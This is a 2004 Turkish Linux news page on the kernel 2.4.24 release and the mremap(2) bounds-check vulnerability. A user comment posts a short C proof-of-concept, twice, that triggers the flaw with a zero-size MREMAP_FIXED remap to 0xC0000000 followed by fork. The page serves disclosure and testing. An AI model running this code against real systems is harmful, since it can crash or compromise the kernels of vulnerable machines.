Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Linus´dan SCO´ya cevap!
sundance
30 Ocak 2004, 9 dakika okuma süresi

SCO´nun iddiaları üzerine son yapılan röportajında Linus Tornvalds, iddiaları yanıtlarken, durumun çok güzel bir resmini çiziyor. Her zamanki sade akılcı üslubu ile duruma açıklık getiriyor.

Fakat bence daha bile önemlisi, email ya da ICQ başına geçtiğinde canavar dönüşen birçok Internet kullanıcısına problemlerin bu şekilde çözülmediğini anlatan bilgece bir yol göstermesi.

Linux Journal Ödülleri
sundance
13 Ekim 2001, 1 dakika okuma süresi

Gelenexel :) Linux Journal.org okuyucu seçimleri yayınlandı...

En tutulan grafik programı Gimp 2
En tutulan editör Vim
En tutulan desktop KDE 2
En tutulan programlama dili C (C++ üçüncü :))
En tutulan web sitesi Slashdot (FM altıncı :)) vs. vs. Bir göz atın

Peru Milletvekilinin Microsoft´a yazdığı mektup.
tupac
9 Haziran 2002, 1 dakika okuma süresi

Peru'da kamu kuruluşlarının serbest yazılım kullanmalarını öngören bir kanun tasarısı hazırlandı. Microsoft Peru, bu tasarıyı hazırlayan Dr. Villanueva'ya, tasarıya itiraz eden bir mektup yazmış. Dr. Villanueva'nın mektuba cevabını buradan okuyabilirsiniz. Türkçe'ye Deniz Akkuş Kanca çevirmiş. Teşekkürler. Oku!Okut!..cümle aleme:)

Cisco da ''Masaüstünde Linux'' dedi
sundance
19 Şubat 2005, 1 dakika okuma süresi

Slashdot'da yer alan habere göre Cisco IT halihazırda şirket bünyesindeki 2000'den fazla masaüstü bilgisayarı Linux'a geçirmiş, önümüzdeki dönemlerde de başta laptoplar olmak üzere büyük ölçüde Linux'a geçmeyi planlıyorlarmış.

Bu geçişte temel sebebin, lisans maliyetleri değil destek maliyetleri olduğu belirtilmiş ve bir Windows admini ortalama 40 Windows PC'e destek verebilirken, bir Linux admininin 200 ila 400 arası Linux PC'e destek verebildiği belirtilmiş.

Linux'un toplam sahip olma maliyeti daha pahalı, çünkü Linux adminleri daha çok para istiyor, diyenlere duyrulur.

Penguence'nin 3. sayısı çıktı
dfisek
7 Aralık 2005, 1 dakika okuma süresi

Linux Kullanıcıları Derneği'nin elektronik yayını, penguen yaşam biçimi dergisi Penguence'nin 3. sayısı yayınlandı. Bir teknik bilgisayar dergisi olmanın ötesinde özgür yazılımı, açık kaynak felsefesini ve paylaşımı yaşam biçimi olarak algılayan duruşu ile Penguence önemli bir boşluğu dolduruyor.